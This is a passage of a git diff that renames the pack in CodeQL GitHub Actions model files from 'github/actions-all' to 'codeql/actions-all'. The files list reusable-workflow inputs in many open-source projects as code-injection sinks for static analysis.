-1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["codeigniter4/codeigniter4/.github/workflows/reusable-serviceless-phpunit-test.yml", "*", "input.extra-composer-options", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml b/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml index f2ebae0b0eac..c7e2c60b08e6 100644 --- a/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["com-lihaoyi/mill/.github/workflows/run-mill-action.yml", "*", "input.millargs", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml b/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml index ec591db22ac9..fa0afdae7691 100644 --- a/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.upgrade-plan-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml b/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml index 06fdea3f8a26..11a756cc063f 100644 --- a/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["crowdsecurity/crowdsec/.github/workflows/publish-docker.yml", "*", "input.latest", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml b/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml index b864551b3fbe..748d28d75452 100644 --- a/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["cryptomator/cryptomator/.github/workflows/get-version.yml", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml b/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml index fdb499a81dcb..5916205cea96 100644 --- a/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["daeuniverse/dae/.github/workflows/seed-build.yml", "*", "input.pr-number", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml b/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml index c831a5d6d8f9..b62e5e5599f9 100644 --- a/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["dafny-lang/dafny/.github/workflows/publish-release-reusable.yml", "*", "input.name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml b/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml index d9d4e9bd2fa9..6f841faecce8 100644 --- a/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["dagger/dagger/.github/workflows/_hack_make.yml", "*", "input.mage-targets", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml b/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml index 4091c74dee5a..3c986e3d00be 100644 --- a/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["dash-industry-forum/dash.js/.github/workflows/deploy.yml", "*", "input.deploy_path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml index 1c6d8804d6d1..32de8a5131df 100644 --- a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["datadog/dd-trace-go/.github/workflows/smoke-tests.yml", "*", "input.go-libddwaf-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml index f94c87537cf4..a28e8e121d28 100644 --- a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["datadog/dd-trace-py/.github/workflows/lib-inject-publish.yml", "*", "input.ddtrace-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml b/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml index efb8e467a0a0..ed8f60f413ee 100644 --- a/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["datafuselabs/databend/.github/workflows/reuse.benchmark.yml", "*", "input.run_id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml index 8a7b36e365c5..476d40b52061 100644 --- a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "input.s3_bucket_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml index 0d6fb59ed509..c8a534d031d7 100644 --- a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "input.nightly_release", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml index 74bdb5ab2801..5d3b6e2a8845 100644 --- a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "input.s3_bucket_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml b/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml index 038fd953d6e8..b402ab78ef5c 100644 --- a/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["decidim/decidim/.github/workflows/test_app.yml", "*", "input.test_command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml b/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml index 0c185f4cbd56..2abf8ff1d320 100644 --- a/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["defectdojo/django-defectdojo/.github/workflows/release-x-manual-helm-chart.yml", "*", "input.release_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml b/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml index 44e89b4e2518..4183d01143fd 100644 --- a/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["dependencytrack/dependency-track/.github/workflows/_meta-build.yaml", "*", "input.app-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml b/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml index 6b4feeedf62f..eebeabb0353c 100644 --- a/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["devexpress/testcafe/.github/workflows/test-server.yml", "*", "input.test-script", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml b/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml index 43e993417170..7279ad6d976f 100644 --- a/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["dfhack/dfhack/.github/workflows/build-windows.yml", "*", "input.artifact-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml b/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml index cc5fb5c8d57a..ccd29346a108 100644 --- a/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["docker/build-push-action/.github/workflows/.e2e-run.yml", "*", "input.id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml b/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml index 64ca7805d901..0d162f9c66b0 100644 --- a/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["dragonwell-project/dragonwell11/.github/workflows/test.yml", "*", "input.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml b/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml index eab60f252385..730a0fc622dd 100644 --- a/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "input.BINARY", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml index fc91813e01b7..7c74a66467b8 100644 --- a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["eclipse-vertx/vert.x/.github/workflows/ci.yml", "*", "input.profile", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml index 253c82f4bef9..af7c7e941118 100644 --- a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["eclipse-vertx/vertx-sql-client/.github/workflows/ci.yml", "*", "input.profile", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml b/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml index eb1b3df774d9..01a7939de43e 100644 --- a/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["elastic/elasticsearch-net/.github/workflows/release.yml", "*", "input.solution", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml b/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml index 3c6e1aaf658e..efd1a84bfb5c 100644 --- a/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["element-hq/element-desktop/.github/workflows/build_windows.yaml", "*", "input.version", "code-injection", "generated"] @@ -10,7 +10,7 @@ extensions: - ["element-hq/element-desktop/.github/workflows/build_macos.yaml", "*", "input.version", "code-injection", "generated"] - ["element-hq/element-desktop/.github/workflows/build_linux.yaml", "*", "input.version", "code-injection", "generated"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["element-hq/element-desktop/.github/workflows/build_prepare.yaml", "*", "input.deploy", "output.deploy", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml b/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml index 3f66f2878303..715a3861fd92 100644 --- a/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["envoyproxy/envoy/.github/workflows/_load.yml", "*", "input.run-id", "output.run-id", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml b/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml index b45eabdf202b..bad92ff76790 100644 --- a/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["etcd-io/bbolt/.github/workflows/robustness_template.yaml", "*", "input.testTimeout", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml b/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml index 76bb69800a9a..90503b3ad3e2 100644 --- a/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["etcd-io/etcd/.github/workflows/tests-template.yaml", "*", "input.arch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml b/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml index 9af37394143f..3d6de142622a 100644 --- a/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["eventstore/eventstore/.github/workflows/build-reusable.yml", "*", "input.arch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml b/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml index 9d0113eb8ece..ab48425c038b 100644 --- a/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["expensify/app/.github/workflows/e2ePerformanceTests.yml", "*", "input.PR_NUMBER", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml b/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml index 90ad3c0f9a18..6c0165b65a91 100644 --- a/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["external-secrets/external-secrets/.github/workflows/publish.yml", "*", "input.image-tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml b/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml index e07d783ae53d..f33f433df1f9 100644 --- a/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["facebook/create-react-app/.github/workflows/e2e-base.yml", "*", "input.testScript", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml b/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml index 3d698b0a84b2..fb700fa7a892 100644 --- a/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "input.aws_s3_cp_extra_args", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml b/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml index 364bd19139e0..60ab0a23c746 100644 --- a/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["falcosecurity/falco/.github/workflows/reusable_build_packages.yaml", "*", "input.build_type", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml b/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml index 85d150cf11c6..e0a72159a7b0 100644 --- a/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["fastify/fastify/.github/workflows/citgm-package.yml", "*", "input.package", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml b/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml index 612a114d79cf..7483ab3366ce 100644 --- a/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ferretdb/ferretdb/.github/workflows/_integration.yml", "*", "input.task", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml b/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml index 86267e5a9217..137558d68d01 100644 --- a/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["filecoin-project/venus/.github/workflows/common_go.yml", "*", "input.test_timeout", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml b/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml index 31d0192f3fba..cb48bce89cfa 100644 --- a/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", "input.triggered_by_callable", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml b/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml index 5116c943f690..9f8338302a3e 100644 --- a/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["flarum/framework/.github/workflows/REUSABLE_backend.yml", "*", "input.monorepo_tests", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml b/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml index 85cb45df8951..49f73a1d620f 100644 --- a/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["fluent/fluent-bit/.github/workflows/call-windows-unit-tests.yaml", "*", "input.unstable", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml b/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml index 4167f4bb982a..e1e8de225309 100644 --- a/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["flux-iac/tofu-controller/.github/workflows/targeted-test.yaml", "*", "input.pattern", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml b/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml index 04b9325cecd9..c2f634f7d000 100644 --- a/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["flyteorg/flyte/.github/workflows/publish.yml", "*", "input.before-build", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml b/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml index 60b966d98a4a..89dcb32c453b 100644 --- a/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["foundatiofx/foundatio/.github/workflows/build-workflow.yml", "*", "input.org", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml b/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml index bbca585931c5..2ea319538441 100644 --- a/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["freecad/freecad/.github/workflows/sub_wrapup.yml", "*", "input.previousSteps", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml b/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml index a0b7c4189672..b9e9d879a66a 100644 --- a/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["getpelican/pelican/.github/workflows/github_pages.yml", "*", "input.output-path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml b/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml index 663826781e7a..8a22c8415e63 100644 --- a/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["getporter/porter/.github/workflows/build_pipelinesrelease_template.yml", "*", "input.registry", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml index c0b8992a6786..a5db7a9533e4 100644 --- a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["getsentry/sentry-dart/.github/workflows/analyze.yml", "*", "input.panaThreshold", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml index a7069a8fa4fa..31113d603ffc 100644 --- a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["getsentry/sentry-unity/.github/workflows/sdk.yml", "*", "input.target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml 